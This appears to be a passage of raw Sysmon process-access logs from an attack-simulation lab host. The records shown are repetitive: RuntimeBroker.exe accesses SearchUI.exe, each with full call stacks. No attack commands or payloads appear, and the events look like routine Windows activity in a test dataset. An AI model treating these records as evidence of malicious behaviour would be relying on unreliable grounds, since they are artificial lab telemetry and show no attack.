12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 